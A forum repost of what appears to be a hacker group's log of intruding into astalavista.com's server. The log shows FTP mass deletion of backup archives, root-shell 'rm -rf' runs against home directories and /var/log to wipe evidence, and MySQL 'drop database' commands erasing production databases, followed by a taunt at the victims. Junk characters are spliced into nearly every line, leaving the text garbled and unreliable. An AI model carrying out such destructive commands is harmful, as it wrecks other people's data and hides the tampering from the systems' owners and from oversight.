dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com j0 j& G. ]9 A% ^! X& T6 ]
226 Transfer complete.5 P# |8 w& i2 }# W$ a7 ~2 O1 H
ftp> cd astalavista.com- ?5 K" x1 i [# o0 G& |* }
250 CWD command successful.7 ~! X' i6 g9 e: t( s7 {5 v
ftp> ls -la( j$ j/ D6 R6 X1 U
227 Entering Passive Mode (212,254,194,163,2,189)5 O d; f6 X0 ]0 t T( M1 p
150 Opening BINARY mode data connection for ‘file list’.
+ v( D% i/ E6 D-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar- d* i6 w' m1 H, V( R! [
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 h; A% l# k) M/ {8 K-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz22 i% I6 i v8 z8 |, B/ z9 i
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
4 N( o( z+ n7 w$ x-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar: W+ }" F$ t' u! K6 p
[snip]: H/ A- p5 `5 l4 k" p) \! r
226 Transfer complete.
6 ]! v* |7 {" K7 N* P6 uftp> mdelete *, y5 `3 N$ G, m C' \ ^
ftp> ls -la# a: d7 v3 ~. o6 E! v( ?
227 Entering Passive Mode (212,254,194,163,2,193). t1 Q6 {+ s+ Z9 S- U
150 Opening BINARY mode data connection for ‘file list’.
& e% r2 T. {/ I226 Transfer complete.
8 Y) V2 r0 ?4 Z/ P2 I% [. q! g' E# Iftp>& H( u& s) N1 ^; U* x7 T9 G' t
$ `. \. m$ v6 M) _: v6 V* d- e7 Y
sh-3.2# cd /home+ o+ a4 [5 J$ L3 }6 p6 ~# V! _
sh-3.2# ls -la
! `0 m; @/ o8 ~( U* Wtotal 120: J4 A9 ^0 d5 N
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
l8 w9 Y( b$ [& k6 tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 b: B# S, O9 V A9 n
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
0 X+ P# m6 p5 t( D |-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
. h9 T; }6 J7 ^5 M. w" d8 ~-rw——- 1 root root 8192 Jun 3 02:45 aquota.user- M7 ~7 s) Y9 r7 m1 `' h
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet1 V6 g. z4 m. f) o2 D
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup. w! _* ]1 f- X1 L# A
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 g, |; i# c. w4 s5 k+ D6 ]; Wdrwx–x–x 10 com com 4096 Apr 28 12:40 com
' b: U5 W1 o8 _" t0 Udrwxr-xr-x 2 root root 4096 May 17 2007 ftp8 `3 l; z+ p# x' t% R
drwx—— 3 jon jon 4096 Sep 21 2007 jon* ?, T9 ^8 @6 U2 R% w
drwx—— 2 root root 16384 Sep 11 2007 lost+found
( @. Q+ [1 Y4 a; f9 tdrwxr-xr-x 2 root root 4096 Sep 14 2007 my4 m5 J0 ^4 @! @ l
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
5 D" \8 p: w0 wdrwx—— 2 jon jon 4096 Sep 15 2007 test
+ i6 ]! |# {* C a1 ?drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp5 q' @/ a8 j3 y4 q7 A. M
3 j: t8 S! J. w
sh-3.2# rm -rf backup/7 H0 j/ G8 p7 V% f& r
sh-3.2# rm -rf backup.14161/
! J$ a C( Y& y0 e0 Osh-3.2# rm -rf ftp/
# s7 G/ I( {1 k( \sh-3.2# rm -rf jon/
+ u! o( S# D+ ?. esh-3.2# rm -rf my/6 A3 v! u% ?2 x* o
sh-3.2# rm -rf mysqldata/
8 G- J# V: C+ B# Xsh-3.2# rm -rf test/ o2 F& U6 e; M/ i4 C7 e. R
sh-3.2# rm -rf tmp/
. J' ~" s8 E1 b6 ?4 Gsh-3.2# cd ~0 W, U1 `8 j& K1 c
sh-3.2# rm -rf *
# b1 K, k, ?& Y) T7 `( p' Osh-3.2# rm -rf /var/log/
2 G; F& `; f7 V' Brm: cannot remove directory `/var/log//proftpd’: Directory not empty
9 p4 E% [$ v) c7 F4 s/ ?+ G3 P' Xsh-3.2# rm -rf /home/*
, b% E7 E7 C @5 H ^% b! Ush-3.2# mysql% n7 j5 b4 [0 m0 F+ Z
Welcome to the MySQL monitor. Commands end with ; or \g.- b; r* x4 ~" G8 |, d: q
Your MySQL connection id is 407156; h# G& L- U" A( k' L
Server version: 5.0.45-community-log MySQL Community Edition (GPL)) V" a: T3 p3 f" L: |# l- E4 h
3 l) G' v# d2 n2 I
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; k- k; N. S9 W. E8 [
+ r {# j! G5 n
mysql> show databases;
) m5 K. D& M+ P1 U! a& l9 G0 m+———————–+( B/ _5 F b, b
| Database |: b$ q; N% U1 ~, y
+———————–+
( M" E: ?& L O% k: O| information_schema |
- S+ o0 x. _! }# H2 K/ u& x| astanet_ads |% a& ]; Z7 k, O5 U# i; f
| astanet_mailing_lists |
; L/ H1 U% p* p| astanet_mediawiki |
. Z! C: x9 O3 }# R8 B$ ~| astanet_membersystem |" Z5 }* S. E2 |7 @
| com_contrexx |7 B" b% b' L+ d- Z
| com_contrexx2 |
1 a! Z4 h) i3 m) g| com_contrexx2_live |
( d. N, c& s& t6 l| da_roundcube |
: w6 `: y* [6 U# n3 P' E& B| dolphin |, f2 Q# J2 Q. g4 T+ l1 a
| ideapool | b0 z- H+ T( @6 _$ P
| mysql |
/ O& K1 U$ Y: Z, U( w8 `$ F| test |2 t, ^# p! e/ _7 M! W/ _5 Z1 l
| yourmaster |3 _; T U. C; B
+———————–+
, W* `1 d$ G2 [, k14 rows in set (0.03 sec)
% z, N% G& [$ D; F( s- T' A/ O, f* I! K7 Y/ {
mysql> drop database astanet_membersystem;! `* R( B1 e" d9 U' X1 C% j( x
droQuery OK, 46 rows affected (0.81 sec)( y3 I$ c& n5 h/ m* n
5 K7 ~2 w" z- dmysql> drop database com_contrexx;
8 ~% z; N1 J g/ |Query OK, 211 rows affected (2.72 sec)) B; _% F3 B1 Z5 N1 l) D
7 S M1 F9 U, P ?- ^/ S% x: C
mysql> drop database com_contrexx2;
7 y8 T- k: t5 W- W. @! t v7 y/ SQuery OK, 237 rows affected (2.23 sec)
- U# e& I. [& Q5 F# _8 C8 C( Z) [ I3 y2 d$ L
mysql> drop database com_contrexx2_live;
. X- D* D2 @# c4 s3 W" cQuery OK, 227 rows affected (7.63 sec)
1 y. \+ A' j' p) K- t4 h7 H ~/ D2 M" ~6 e0 i; d
mysql> drop database ideapool;
3 R. I. D1 u' Z# Y4 f/ _Query OK, 69 rows affected (0.19 sec)
' X) _3 Y% y: |9 I5 n" D( Y
. R5 a$ d7 R& ?; r+ Dmysql> drop database yourmaster;. X. G( N Y8 N9 X. Z( I3 T
Query OK, 158 rows affected (0.55 sec)
! V+ c" M7 }2 H4 j' L: O
- Z, r8 o* m/ j# [mysql> drop database astanet_ads;
5 C. j$ b! w5 f1 T+ NQuery OK, 9 rows affected (0.11 sec)
' |; G; U8 W X) h4 S G8 h
j y( C9 p7 S) P' zmysql> drop database astanet_mailing_lists;( | c$ P2 J% g5 U
Query OK, 24 rows affected (1.47 sec)4 m2 Y' q5 }4 l; D) e/ k3 g
' c9 _! t/ J; S6 P% Z6 Omysql> drop database astanet_mediawiki;
5 @* Y' C: y7 E- w( mQuery OK, 31 rows affected (0.51 sec)8 ]5 F7 H9 n3 Z1 {4 B& D% n) c
3 s- m* o1 c$ {* c% M
mysql> show databases;( V+ h2 y" u9 c( u& T. ^
+——————–+; V- R" k5 H' O- L+ C- `. ]
| Database |' i0 ]& a2 h! z, }, _' ?. [
+——————–+ j+ S8 Y/ O4 J# ]: ]$ b9 j
| information_schema |
+ T( N/ @8 ~( H| da_roundcube |
" ?8 W( u& I4 @| dolphin |4 Q1 I* g1 E% {4 N
| mysql |- e; F# b% W3 J+ h9 X
| test |
' F' B4 s/ V5 l! a/ ^2 r! i+——————–+
' W% [: G6 u/ D5 rows in set (0.00 sec)
& N& V. K }" m+ u1 P- m, |6 g2 m9 J6 r+ @% F; q" s
What a journey! We’re not sure exactly why the “Terminator” had any influence on1 a% q. j& O' o% i" S; W6 c2 |' G8 m4 ~
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
3 D0 _. g8 ?* v( R; e/ cwrong to say this pack of morons *wont be back*.7 g& g% E: J) I; c+ r l
|
发表于 2012-11-6 21:07:34
收藏
支持
反对